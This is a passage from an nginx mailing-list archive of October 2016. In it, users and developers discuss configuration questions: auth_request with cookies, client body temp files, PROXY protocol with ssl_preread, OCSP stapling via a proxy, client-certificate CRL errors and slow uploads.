From nginx-forum at forum.nginx.org Wed Oct 12 11:09:22 2016 From: nginx-forum at forum.nginx.org (netcana) Date: Wed, 12 Oct 2016 07:09:22 -0400 Subject: Practical size limit of config files In-Reply-To: References: Message-ID: <7bf878c21818ae77b8d586b187f34798.NginxMailingListEnglish@forum.nginx.org> same question here but i think no one knows that's why there is no reply. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270109,270197#msg-270197 From nginx-forum at forum.nginx.org Wed Oct 12 11:11:57 2016 From: nginx-forum at forum.nginx.org (netcana) Date: Wed, 12 Oct 2016 07:11:57 -0400 Subject: URL is not pointing to https on iframe In-Reply-To: References: Message-ID: <900484913fd476e79073886182b0898c.NginxMailingListEnglish@forum.nginx.org> wish you all the best for your project but sorry i have no clue about your question. Thanks. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270042,270198#msg-270198 From mdounin at mdounin.ru Wed Oct 12 13:52:14 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 12 Oct 2016 16:52:14 +0300 Subject: [nginx-announce] nginx-1.11.5 In-Reply-To: References: <20161011153240.GD73038@mdounin.ru> Message-ID: <20161012135214.GG73038@mdounin.ru> Hello! On Wed, Oct 12, 2016 at 03:03:29PM +0530, Anoop Alias wrote: > *) Feature: the --with-compat configure option. > > What does this do actually? This option enables dynamic modules compatibility, that is, it ensures that appropriate fields in structures are present (or appropriately-sized placeholders are added). As a result, it is now possible to compile compatible dynamic modules using a minimal set of configure arguments as long as main nginx binary is compiled using --with-compat. Just ./configure --with-compat --add-dynamic-module=/path/to/module should be enough to compile a binary compatible module. Additionally, this option enables binary compatibility of dynamic modules with our commercial product, NGINX Plus, and thus allows one to compile and load custom modules into NGINX Plus. Corresponding version of NGINX Plus is yet to be released though. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Wed Oct 12 14:02:10 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 12 Oct 2016 17:02:10 +0300 Subject: newbie question In-Reply-To: References: Message-ID: <20161012140210.GH73038@mdounin.ru> Hello! On Wed, Oct 12, 2016 at 12:43:12PM +1100, Alex Samad wrote: > Hi > > I am trying to create a dynamic auth address > > > # grab ssoid > map $cookie_SSOID $ssoid_cookie { > default ""; > ~SSOID=(?P.+) $ssoid; > } > > > location /imaadmin/ { > proxy_cache off; > proxy_pass http://IMAAdmin; > > > > auth_request /sso/validate?SSOID=$ssoid_cookie&a=imaadmin; > > > what I am trying to do is fill the variable ssoid_cookie with the > cookie value for SSOID in the request or make it blank > > then when somebody tries to access /imaadmin make the auth request > /sso/validate?SSOID=$ssoid_cookie&a=imaadmin; > > but i get this > GET /sso/validate%3FSSOID=$ssoid_cookie&a=imaadmin HTTP/1.0 This is because the "auth_request" directive doesn't support variables, and also doesn't support request arguments. Try this instead: location /imaadmin/ { auth_request /sso/validate; ... proxy_pass ... } location = /sso/validate { set $args SSOID=$ssoid_cookie&a=imaadmin; ... proxy_pass ... } -- Maxim Dounin http://nginx.org/ From akshayaamohan05 at gmail.com Wed Oct 12 15:22:15 2016 From: akshayaamohan05 at gmail.com (AKSHAYAA MOHAN) Date: Wed, 12 Oct 2016 20:52:15 +0530 Subject: Log response location headers when Nginx is used as reverse proxy Message-ID: Hi, I have a usecase where I want to log the response location headers returned by the upstream servers. Is there a way I can do this without installing any third party tools? Regards -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Wed Oct 12 16:03:02 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 12 Oct 2016 17:03:02 +0100 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <216fd4b10237c6458f868f35d5a7f2ac.NginxMailingListEnglish@forum.nginx.org> References: <20161010161622.GB11677@daoine.org> <216fd4b10237c6458f868f35d5a7f2ac.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161012160302.GD11677@daoine.org> On Wed, Oct 12, 2016 at 06:28:47AM -0400, yurai wrote: Hi there, > >"The file should be transferred to the nginx server." > > This is the whole point. > With current configuration when I type curl --data-binary '@upload.txt' > http://localhost/upload file is NOT transffered from client to server at all > - "proxy_pass" is performed and I only get HTTP response 200. There is the client. There is the nginx server, that the client talks to. There is the upstream back-end server, that nginx talks to. Are you reporting that the content of the client-file upload.txt is not saved on the nginx server that is localhost, in a numbered file below your client_body_temp_path? Or are you reporting that the content of the client-file upload.txt is not transferred to the upstream back-end server? There is more than one server involved. Please be very clear which one you are referring to, when you refer to any. > When I change my configuration (by removing whole backend configuration (s2 > block) and all proxy_* directives from s1) and type same command I get HTTP > 405 Not Allowed or HTTP 301 Moved Permanently. > > Let's ignore for the second size of my file in body. Maybe in this moment > the right question is: what should I do to make my above curl command work? It works for me. Perhaps I have a different idea of what "works" mean. f -- Francis Daly francis at daoine.org From thomas at glanzmann.de Wed Oct 12 17:50:06 2016 From: thomas at glanzmann.de (Thomas Glanzmann) Date: Wed, 12 Oct 2016 19:50:06 +0200 Subject: Use ngx_stream_ssl_preread_module but also log client ip in access.log for https requests Message-ID: <20161012175006.GD5983@glanzmann.de> Hello, I would like to use ngx_stream_ssl_preread_module to multiplex a web server, openvpn, and squid to one ip address and port. However I would also like to keep the real client ip address in my http logs, is that possible, if so how? Cheers, Thomas From arut at nginx.com Wed Oct 12 18:06:58 2016 From: arut at nginx.com (Roman Arutyunyan) Date: Wed, 12 Oct 2016 21:06:58 +0300 Subject: Use ngx_stream_ssl_preread_module but also log client ip in access.log for https requests In-Reply-To: <20161012175006.GD5983@glanzmann.de> References: <20161012175006.GD5983@glanzmann.de> Message-ID: <20161012180658.GD52217@Romans-MacBook-Air.local> Hi Thomas, On Wed, Oct 12, 2016 at 07:50:06PM +0200, Thomas Glanzmann wrote: > Hello, > I would like to use ngx_stream_ssl_preread_module to multiplex a web > server, openvpn, and squid to one ip address and port. However I would > also like to keep the real client ip address in my http logs, is that > possible, if so how? You can enable the PROXY protocol for upstream connections. But your backends must support it. http://nginx.org/en/docs/stream/ngx_stream_proxy_module.html#proxy_protocol -- Roman Arutyunyan From thomas at glanzmann.de Wed Oct 12 18:33:29 2016 From: thomas at glanzmann.de (Thomas Glanzmann) Date: Wed, 12 Oct 2016 20:33:29 +0200 Subject: Use ngx_stream_ssl_preread_module but also log client ip in access.log for https requests In-Reply-To: <20161012180658.GD52217@Romans-MacBook-Air.local> References: <20161012175006.GD5983@glanzmann.de> <20161012180658.GD52217@Romans-MacBook-Air.local> Message-ID: <20161012183329.GB12201@glanzmann.de> Hello Roman, * Roman Arutyunyan [2016-10-12 20:07]: > On Wed, Oct 12, 2016 at 07:50:06PM +0200, Thomas Glanzmann wrote: > > I would like to use ngx_stream_ssl_preread_module to multiplex a web > > server, openvpn, and squid to one ip address and port. However I would > > also like to keep the real client ip address in my http logs, is that > > possible, if so how? > You can enable the PROXY protocol for upstream connections. > But your backends must support it. > http://nginx.org/en/docs/stream/ngx_stream_proxy_module.html#proxy_protocol thanks a lot for the hint. It works like a charm. For others want to do the same, I did the following: - configured nginx with --with-stream --with-stream_ssl_preread_module - For https listened on stream: stream { proxy_protocol on; upstream webserver { server 127.0.0.1:443; } map $ssl_preread_server_name $name { default webserver; } server { listen :443; proxy_pass $name; ssl_preread on; } } - In my http context, I added: set_real_ip_from 127.0.0.1; real_ip_header proxy_protocol; - And in my https listen directives I put: listen 127.0.0.1:443 ssl http2 proxy_protocol; I didn't even had to modify the access_log logformat because apparently 'real_ip_header proxy_protocol' takes care of that. Cheers, Thomas From nginx-forum at forum.nginx.org Wed Oct 12 19:34:45 2016 From: nginx-forum at forum.nginx.org (yurai) Date: Wed, 12 Oct 2016 15:34:45 -0400 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <20161012160302.GD11677@daoine.org> References: <20161012160302.GD11677@daoine.org> Message-ID: <4483dc9306924ed387ae3c4183e1cc23.NginxMailingListEnglish@forum.nginx.org> Hi, >Are you reporting that the content of the client-file upload.txt is not >saved on the nginx server that is localhost, in a numbered file below >your client_body_temp_path? Yes. Exactly this. My /tmp/nginx-client-body directory is empty. >There is more than one server involved. Please be very clear which one >you are referring to, when you refer to any. Please notice that in many places I try to be precised as much as possible by reffering to s1 and s2. Sorry for confusion. By writing "server" I mean s1. By writing "backend" I mean s2. Both server names comes from configuration file I placed on beginning of discussion. Regards, Dawid Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270063,270222#msg-270222 From nginx-forum at forum.nginx.org Wed Oct 12 19:44:39 2016 From: nginx-forum at forum.nginx.org (itpp2012) Date: Wed, 12 Oct 2016 15:44:39 -0400 Subject: URL is not pointing to https on iframe In-Reply-To: References: Message-ID: <52c40d5e12a504e8e0fb9a570061fb8f.NginxMailingListEnglish@forum.nginx.org> geopcgeo Wrote: ------------------------------------------------------- > fine on https. But please let me know whats the issue? Is it on Iframe > or > on Nginx. Can anyone please help us? This needs to be fixed in the iframe (or whatever you use to generate this iframe). Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270042,270224#msg-270224 From francis at daoine.org Wed Oct 12 21:44:43 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 12 Oct 2016 22:44:43 +0100 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <4483dc9306924ed387ae3c4183e1cc23.NginxMailingListEnglish@forum.nginx.org> References: <20161012160302.GD11677@daoine.org> <4483dc9306924ed387ae3c4183e1cc23.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161012214443.GE11677@daoine.org> On Wed, Oct 12, 2016 at 03:34:45PM -0400, yurai wrote: Hi there, > >Are you reporting that the content of the client-file upload.txt is not > >saved on the nginx server that is localhost, in a numbered file below > >your client_body_temp_path? > > Yes. Exactly this. My /tmp/nginx-client-body directory is empty. Ok, that is unexpected to me. I've read back over the mail thread, and there seem to be a few things where it is not clear to me what exactly is happening. Can you make a test nginx.conf that is very simple, in an attempt to isolate where things are going wrong? I use this: == events {} http { server { listen 8008; location = /upload { client_body_temp_path /tmp/clientb; client_body_in_file_only on; proxy_set_header X-FILE $request_body_file; proxy_pass http://127.0.0.1:8008/upstream; } location = /upstream { return 200 "Look in $http_x_file\n"; } } } == and when I do curl -v --data-binary words http://127.0.0.1:8008/upload I see the POST with Content-Length: 5; I get a response of "Look in " and a filename, and when I "ls -l" that filename I see that it is 5 bytes long. I use /tmp/clientb as the client directory above; that directory did not exist before I reloaded nginx, so nginx will create it with suitable permissions. When I then do curl -v --data-binary @upload.txt http://127.0.0.1:8008/upload I see the POST with Content-Length: 16; I get a response of "Look in " and a different filename, and when I "cat" that filename I see the same 16-byte content as was in my original local upload.txt file. When you do exactly that, do you see anything different? Note that this is *not* exactly the same as your original case, because it leaves out many of the config directives. In particular, this *does* send the initial POST content to the upstream. That's ok; the point of this is to find out why and where the initial set-up is broken. Other bits can be added afterwards. > >There is more than one server involved. Please be very clear which one > >you are referring to, when you refer to any. > > Please notice that in many places I try to be precised as much as possible > by reffering to s1 and s2. Sorry for confusion. Actually, I'm wrong there, sorry about that. I had got confused with a separate mail; your mails were clear about the two server blocks on the one nginx on localhost. Thanks, f -- Francis Daly francis at daoine.org From alex at samad.com.au Thu Oct 13 04:53:37 2016 From: alex at samad.com.au (Alex Samad) Date: Thu, 13 Oct 2016 15:53:37 +1100 Subject: newbie question In-Reply-To: <20161012140210.GH73038@mdounin.ru> References: <20161012140210.GH73038@mdounin.ru> Message-ID: Hi Thanks I ended up with this but still with issues map $cookie_SSOID $ssoid_cookie { default ""; ~SSOID=(?P.+) $ssoid; } location /imaadmin/ { proxy_cache off; proxy_pass http://IMAAdmin; auth_request /sso/validate; # must use %20 for url encoding set $sso_group "Staff-sso"; proxy_pass error_page 401 = @error401; location @error401 { # return 302 https://$server_name/sso/login; rewrite ^ https://$server_name/sso/login; } location /sso/validate { proxy_cache off; rewrite (.*) $1?SSOID=$cookie_ssoid&a=$sso_group? break; proxy_set_header X-Original-URI $request_uri; proxy_pass location /sso/ { proxy_cache off; rewrite (.*) $1 break; proxy_set_header X-Original-URI $request_uri; proxy_set_header X-Original-URI "imaadmin"; # have to hard code proxy_pass So http://abc.com.au/imaadmin does a http://abc.com.au/sso/validate?SSOID=&a= 200 = okay 401 redirect to http://abc.com.au/sso/login sso redirects to http://abc.com.au/sso/login/form/[X-Original-URI] <<< its failing here I am hard coding this Thanks On 13 October 2016 at 01:02, Maxim Dounin wrote: > Hello! > > On Wed, Oct 12, 2016 at 12:43:12PM +1100, Alex Samad wrote: > >> Hi >> >> I am trying to create a dynamic auth address >> >> >> # grab ssoid >> map $cookie_SSOID $ssoid_cookie { >> default ""; >> ~SSOID=(?P.+) $ssoid; >> } >> >> >> location /imaadmin/ { >> proxy_cache off; >> proxy_pass http://IMAAdmin; >> >> >> >> auth_request /sso/validate?SSOID=$ssoid_cookie&a=imaadmin; >> >> >> what I am trying to do is fill the variable ssoid_cookie with the >> cookie value for SSOID in the request or make it blank >> >> then when somebody tries to access /imaadmin make the auth request >> /sso/validate?SSOID=$ssoid_cookie&a=imaadmin; >> >> but i get this >> GET /sso/validate%3FSSOID=$ssoid_cookie&a=imaadmin HTTP/1.0 > > This is because the "auth_request" directive doesn't support > variables, and also doesn't support request arguments. > > Try this instead: > > location /imaadmin/ { > auth_request /sso/validate; > ... proxy_pass ... > } > > location = /sso/validate { > set $args SSOID=$ssoid_cookie&a=imaadmin; > ... proxy_pass ... > } > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From zeal at freecharge.com Thu Oct 13 09:37:25 2016 From: zeal at freecharge.com (Zeal Vora) Date: Thu, 13 Oct 2016 15:07:25 +0530 Subject: NGINX not checking OCSP for revoked certificates Message-ID: Hi We've implemented basic Certificate Based Authentication for Nginx. However whenever the certificate is revoked, Nginx still allows the client ( with revoked certificate ) to access the website. I verified manually with openssl with OCSP URI and OCSP seems to be working properly. Nginx doesn't seem to be forwarding request to OCSP before allowing client. I tried to specify the ssl_crl but as soon as I put it, all the clients starts to receive 400 Bad Request. Here is my sample relevant Nginx Config :- ### SSL cert files ### ssl_client_certificate /test/ca.crt; ssl_verify_client optional; ssl_crl /prod-adcs/latest.pem; ssl_verify_depth 2; Is there something that I'm missing here ? Any help will be appreciated. -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Thu Oct 13 09:40:21 2016 From: nginx-forum at forum.nginx.org (lancee83) Date: Thu, 13 Oct 2016 05:40:21 -0400 Subject: Multiple proxy_cache_path location Message-ID: Hi All I'm using nginx with Unified Streaming - I would like to have different cache settings per channel. Is it possible to state different proxy_cache_path parameters? Thanks in advance Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270240,270240#msg-270240 From rainer at ultra-secure.de Thu Oct 13 10:25:44 2016 From: rainer at ultra-secure.de (rainer at ultra-secure.de) Date: Thu, 13 Oct 2016 12:25:44 +0200 Subject: ocsp-stapling through http proxy? Message-ID: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> Hi, we have been informed by our CA that they will be moving their OCSP-servers to "the cloud" - it was a fixed set of IPs before. These fixed sets could relatively easily be entered as firewall rules (and hosts-file entries, should DNS-resolution be unavailable). Of course, they could as easily be targeted by Script-Kiddies and Wannabe-Hackers as targets for a DDoS. As such, I would need to allow outbound http-connections to the whole internet, which is kind of exactly the opposite of what I want to do. And that's ignoring for a moment the necessity to allow outbound DNS... It would be cool if nginx would be able to do the stapling through a http-proxy. Rainer From r at roze.lv Thu Oct 13 11:16:42 2016 From: r at roze.lv (Reinis Rozitis) Date: Thu, 13 Oct 2016 14:16:42 +0300 Subject: ocsp-stapling through http proxy? In-Reply-To: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> References: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> Message-ID: <005c01d22543$46a3eb70$d3ebc250$@roze.lv> > It would be cool if nginx would be able to do the stapling through a http- > proxy. Technically you could just "override" (via /etc/hosts or if you have your own dns service) your ssl's provider ocsp ip to your own proxy which will forward then the requests to the original server. p.s. in this case though probably a simple http proxy won't do but tcp should work rr From rainer at ultra-secure.de Thu Oct 13 12:22:58 2016 From: rainer at ultra-secure.de (rainer at ultra-secure.de) Date: Thu, 13 Oct 2016 14:22:58 +0200 Subject: ocsp-stapling through http proxy? In-Reply-To: <005c01d22543$46a3eb70$d3ebc250$@roze.lv> References: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> <005c01d22543$46a3eb70$d3ebc250$@roze.lv> Message-ID: <2bec12a28a9c26fa84ae590ecc39a0cb@ultra-secure.de> Am 2016-10-13 13:16, schrieb Reinis Rozitis: >> It would be cool if nginx would be able to do the stapling through a >> http- >> proxy. > > Technically you could just "override" (via /etc/hosts or if you have > your own dns service) your ssl's provider ocsp ip to your own proxy > which will forward then the requests to the original server. You mean a transparent proxy? In our case, this is not possible. From mdounin at mdounin.ru Thu Oct 13 12:57:32 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 13 Oct 2016 15:57:32 +0300 Subject: NGINX not checking OCSP for revoked certificates In-Reply-To: References: Message-ID: <20161013125732.GR73038@mdounin.ru> Hello! On Thu, Oct 13, 2016 at 03:07:25PM +0530, Zeal Vora wrote: > Hi > > We've implemented basic Certificate Based Authentication for Nginx. > > However whenever the certificate is revoked, Nginx still allows the client > ( with revoked certificate ) to access the website. > > I verified manually with openssl with OCSP URI and OCSP seems to be working > properly. Nginx doesn't seem to be forwarding request to OCSP before > allowing client. That's because nginx doesn't support OCSP validation of client certificates. Use CRLs instead. > I tried to specify the ssl_crl but as soon as I put it, all the clients > starts to receive 400 Bad Request. > > Here is my sample relevant Nginx Config :- > > > ### SSL cert files ### > > ssl_client_certificate /test/ca.crt; > ssl_verify_client optional; > > ssl_crl /prod-adcs/latest.pem; > ssl_verify_depth 2; > > > Is there something that I'm missing here ? Your error log should have details. Given you are using verify depth set to 2, most likely there is no CRL for the root certificate itself, and that's why nginx complaining. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Thu Oct 13 13:34:14 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 13 Oct 2016 16:34:14 +0300 Subject: ocsp-stapling through http proxy? In-Reply-To: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> References: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> Message-ID: <20161013133414.GT73038@mdounin.ru> Hello! On Thu, Oct 13, 2016 at 12:25:44PM +0200, rainer at ultra-secure.de wrote: > Hi, > > we have been informed by our CA that they will be moving their OCSP-servers > to "the cloud" - it was a fixed set of IPs before. > These fixed sets could relatively easily be entered as firewall rules (and > hosts-file entries, should DNS-resolution be unavailable). > Of course, they could as easily be targeted by Script-Kiddies and > Wannabe-Hackers as targets for a DDoS. > > As such, I would need to allow outbound http-connections to the whole > internet, which is kind of exactly the opposite of what I want to do. > And that's ignoring for a moment the necessity to allow outbound DNS... > > It would be cool if nginx would be able to do the stapling through a > http-proxy. OCSP stapling allows you to: - provide your own file to staple using ssl_stapling_file directive. It doesn't matter for nginx how the file was obtained. You can even update it by hand. It might be relatively straightforward to configure automatic updating process though. See http://nginx.org/r/ssl_stapling_file for details. - use an explicitly configured OCSP responder with the ssl_stapling_responder directive. It allows to configure your own OCSP responder at a fixed address, and then proxy requests to the real responder. See http://nginx.org/r/ssl_stapling_responder for details. -- Maxim Dounin http://nginx.org/ From r at roze.lv Thu Oct 13 14:13:20 2016 From: r at roze.lv (Reinis Rozitis) Date: Thu, 13 Oct 2016 17:13:20 +0300 Subject: ocsp-stapling through http proxy? In-Reply-To: <2bec12a28a9c26fa84ae590ecc39a0cb@ultra-secure.de> References: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> <005c01d22543$46a3eb70$d3ebc250$@roze.lv> <2bec12a28a9c26fa84ae590ecc39a0cb@ultra-secure.de> Message-ID: > You mean a transparent proxy? > In our case, this is not possible. It's not really transparent. As far as I understand you have a problem with opening outgoing traffic to _random_ destination but you are fine if such traffic is pushed through some proxy server (which in general means that the proxy server will anyways have outgoing to "everywhere"). So while there is no http proxy support for such things in nginx ( in Apache as a workarround you can override the responders url https://httpd.apache.org/docs/2.4/mod/mod_ssl.html#sslstaplingforceurl ) what you could do is just force the ocsp responders host to resolve to your proxy (no other traffic has to be altered) which then forwards the request to the original responder. The proxy could be aswell another nginx instance (the problem is just that nginx (besides the commercial nginx+) doesn't resolve (without some workarrounds) backend hostnames on the fly but only on startup). But in the end do you really need it? Even in the "cloud" the IPs shouldn't change too often (if so maybe it's worth to look for another SSL provider?) also there is no failure if suddenly the stapling doesn't happen serverside, just monitor it and when the resolution changes (or nginx starts to complain) alter your firewall rules. p.s. I haven't done the "proxy part" but at one time there were problems with Godaddys European ocsp responders so I did the DNS thingy and forced the ocsp.godaddy.com to be resolved to US ips and it worked fine. rr From r at roze.lv Thu Oct 13 14:15:36 2016 From: r at roze.lv (Reinis Rozitis) Date: Thu, 13 Oct 2016 17:15:36 +0300 Subject: ocsp-stapling through http proxy? In-Reply-To: <20161013133414.GT73038@mdounin.ru> References: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> <20161013133414.GT73038@mdounin.ru> Message-ID: >- use an explicitly configured OCSP responder with the > ssl_stapling_responder directive. It allows to configure your > own OCSP responder at a fixed address, and then proxy requests to > the real responder. See http://nginx.org/r/ssl_stapling_responder > for details. Ohh totally have looked over this setting .. also since 1.3.7. Apparantly need to reread documentation way often. rr From rainer at ultra-secure.de Thu Oct 13 14:45:01 2016 From: rainer at ultra-secure.de (rainer at ultra-secure.de) Date: Thu, 13 Oct 2016 16:45:01 +0200 Subject: ocsp-stapling through http proxy? In-Reply-To: References: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> <005c01d22543$46a3eb70$d3ebc250$@roze.lv> <2bec12a28a9c26fa84ae590ecc39a0cb@ultra-secure.de> Message-ID: <9c1c11949268d7f2b2d0a44b1bc6381f@ultra-secure.de> Am 2016-10-13 16:13, schrieb Reinis Rozitis: >> You mean a transparent proxy? >> In our case, this is not possible. > > It's not really transparent. > > As far as I understand you have a problem with opening outgoing > traffic to _random_ destination but you are fine if such traffic is > pushed through some proxy server (which in general means that the > proxy server will anyways have outgoing to "everywhere"). Yes, but the OCSP URL is known and doesn't change. And the proxy has a very limited set of URLs it can access. As such, this is much better than opening up "*". > So while there is no http proxy support for such things in nginx ( in > Apache as a workarround you can override the responders url > https://httpd.apache.org/docs/2.4/mod/mod_ssl.html#sslstaplingforceurl > ) what you could do is just force the ocsp responders host to resolve > to your proxy (no other traffic has to be altered) which then forwards > the request to the original responder. I will have to try this. > The proxy could be aswell another nginx instance (the problem is just > that nginx (besides the commercial nginx+) doesn't resolve (without > some workarrounds) backend hostnames on the fly but only on startup). > > > > But in the end do you really need it? > > Even in the "cloud" the IPs shouldn't change too often (if so maybe > it's worth to look for another SSL provider?) also there is no failure > if suddenly the stapling doesn't happen serverside, just monitor it > and when the resolution changes (or nginx starts to complain) alter > your firewall rules. I have a lot of these proxies. Also TTLs on these records are notoriously short and I have no idea what scheme our CA has chosen for running these boxes. As I know a bit about the CA software they use, my guess would also be that these servers are going to be relatively stable. Changing to a different CA is not an option, either - and not my call anyway... > p.s. I haven't done the "proxy part" but at one time there were > problems with Godaddys European ocsp responders so I did the DNS > thingy and forced the ocsp.godaddy.com to be resolved to US ips and it > worked fine. I generally try to avoid hosts-file entries. They are a source of hassle and confusion. The only exception is when you need to point a server to itself and the public IP the name resolves to is different (because: NAT) than the IP the server is running on. Then I do create 127.0.0.1 entries in the hosts-file. Thanks for your input. Rainer From shahzaib.cb at gmail.com Thu Oct 13 17:39:18 2016 From: shahzaib.cb at gmail.com (shahzaib mushtaq) Date: Thu, 13 Oct 2016 22:39:18 +0500 Subject: Slow uploading speed !! Message-ID: Hi, We're facing quite slow uploading speed on FreeBSD-10.X over HTTP (NGINX). Hardware is quite strong with 4x1Gbps LACP / 65G RAM / 12x3TB SATA . There's not much load on HDDs so i suspect that maybe tcp tuning has some problem. Here is my sysctl.conf http://pastebin.com/MqNbD3VR Here is /boot/loader.conf : http://pastebin.com/WrW3ceVF I'd also like to inform that -tso is disabled on all interfaces. Regarding upload mechanism : - client uploads the video with HTTP POST request on a file name uploader.php - uploading starts Is there some NGINX variables which we can tweak for POST request ? Currently the relevant one looks to be fastcgi_buffers . Here is nginx.conf : http://pastebin.com/ek7TCJha Thanks in advance !! Regards. Shahzaib -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Thu Oct 13 19:44:18 2016 From: r at roze.lv (Reinis Rozitis) Date: Thu, 13 Oct 2016 22:44:18 +0300 Subject: Slow uploading speed !! In-Reply-To: References: Message-ID: <00fd01d2258a$30114b40$9033e1c0$@roze.lv> > We're facing quite slow uploading speed on FreeBSD-10.X over HTTP (NGINX). How slow is "slow"? As in you didn't provide any metrics. > There's not much load on HDDs so i suspect that maybe tcp tuning has some problem. Well you could simply transfer a file via scp (-c arcfour) or netcat to see if the bottleneck is network/tcp. > Is there some NGINX variables which we can tweak for POST request ? Currently the relevant one looks to be fastcgi_buffers . Here is nginx.conf : > http://pastebin.com/ek7TCJha Fastcgi_buffers don't affect upload bandwidth. But client_body_buffer_size 4096M; seems a bit extreme to me since even with 65G ram you would be able to have only ~16 simultaneous uploads (if all upload ~4G the same time) - a quite possible dos factor. rr From zeal at freecharge.com Fri Oct 14 05:49:27 2016 From: zeal at freecharge.com (Zeal Vora) Date: Fri, 14 Oct 2016 11:19:27 +0530 Subject: NGINX not checking OCSP for revoked certificates In-Reply-To: <20161013125732.GR73038@mdounin.ru> References: <20161013125732.GR73038@mdounin.ru> Message-ID: Thanks Maxim. I tried changing the ssl_verify_depth to 1 from value of 2 however still I get 400 Bad Request for all the certificates ( Valid and Revoked ). I checked the error_log file, there are no entries in that file. It all works when I remove the ssl_crl option ( however then revoked certificates are allowed ). Just for bit more info, I downloaded the CRL from ADCS which is in form of test.crl which I convert it to .pem format with openssl. On Thu, Oct 13, 2016 at 6:27 PM, Maxim Dounin wrote: > Hello! > > On Thu, Oct 13, 2016 at 03:07:25PM +0530, Zeal Vora wrote: > > > Hi > > > > We've implemented basic Certificate Based Authentication for Nginx. > > > > However whenever the certificate is revoked, Nginx still allows the > client > > ( with revoked certificate ) to access the website. > > > > I verified manually with openssl with OCSP URI and OCSP seems to be > working > > properly. Nginx doesn't seem to be forwarding request to OCSP before > > allowing client. > > That's because nginx doesn't support OCSP validation of client > certificates. Use CRLs instead. > > > I tried to specify the ssl_crl but as soon as I put it, all the clients > > starts to receive 400 Bad Request. > > > > Here is my sample relevant Nginx Config :- > > > > > > ### SSL cert files ### > > > > ssl_client_certificate /test/ca.crt; > > ssl_verify_client optional; > > > > ssl_crl /prod-adcs/latest.pem; > > ssl_verify_depth 2; > > > > > > Is there something that I'm missing here ? > > Your error log should have details. Given you are using verify > depth set to 2, most likely there is no CRL for the root > certificate itself, and that's why nginx complaining. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From alex at samad.com.au Fri Oct 14 08:50:35 2016 From: alex at samad.com.au (Alex Samad) Date: Fri, 14 Oct 2016 19:50:35 +1100 Subject: NGINX not checking OCSP for revoked certificates In-Reply-To: References: <20161013125732.GR73038@mdounin.ru> Message-ID: What I had to do was sent the depth to the number or greater than the number of ca's and I had to get all the crl's for each CA and concat into a crl file. On 14 October 2016 at 16:49, Zeal Vora wrote: > Thanks Maxim. > > I tried changing the ssl_verify_depth to 1 from value of 2 however still I > get 400 Bad Request for all the certificates ( Valid and Revoked ). > > I checked the error_log file, there are no entries in that file. It all > works when I remove the ssl_crl option ( however then revoked certificates > are allowed ). > > Just for bit more info, I downloaded the CRL from ADCS which is in form of > test.crl which I convert it to .pem format with openssl. > > > > > On Thu, Oct 13, 2016 at 6:27 PM, Maxim Dounin wrote: >> >> Hello! >> >> On Thu, Oct 13, 2016 at 03:07:25PM +0530, Zeal Vora wrote: >> >> > Hi >> > >> > We've implemented basic Certificate Based Authentication for Nginx. >> > >> > However whenever the certificate is revoked, Nginx still allows the >> > client >> > ( with revoked certificate ) to access the website. >> > >> > I verified manually with openssl with OCSP URI and OCSP seems to be >> > working >> > properly. Nginx doesn't seem to be forwarding request to OCSP before >> > allowing client. >> >> That's because nginx doesn't support OCSP validation of client >> certificates. Use CRLs instead. >> >> > I tried to specify the ssl_crl but as soon as I put it, all the clients >> > starts to receive 400 Bad Request. >> > >> > Here is my sample relevant Nginx Config :- >> > >> > >> > ### SSL cert files ### >> > >> > ssl_client_certificate /test/ca.crt; >> > ssl_verify_client optional; >> > >> > ssl_crl /prod-adcs/latest.pem; >> > ssl_verify_depth 2; >> > >> > >> > Is there something that I'm missing here ? >> >> Your error log should have details. Given you are using verify >> depth set to 2, most likely there is no CRL for the root >> certificate itself, and that's why nginx complaining. >> >> -- >> Maxim Dounin >> http://nginx.org/ >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From zeal at freecharge.com Fri Oct 14 10:02:05 2016 From: zeal at freecharge.com (Zeal Vora) Date: Fri, 14 Oct 2016 15:32:05 +0530 Subject: NGINX not checking OCSP for revoked certificates In-Reply-To: References: <20161013125732.GR73038@mdounin.ru> Message-ID: Oh. We have just one root CA and I downloaded the CRL file for that CA and used it in nginx. The depth is also 1. As soon as I put crl config in nginx, all request leads to HTTP 400 Bad Request . On Fri, Oct 14, 2016 at 2:20 PM, Alex Samad wrote: > What I had to do was sent the 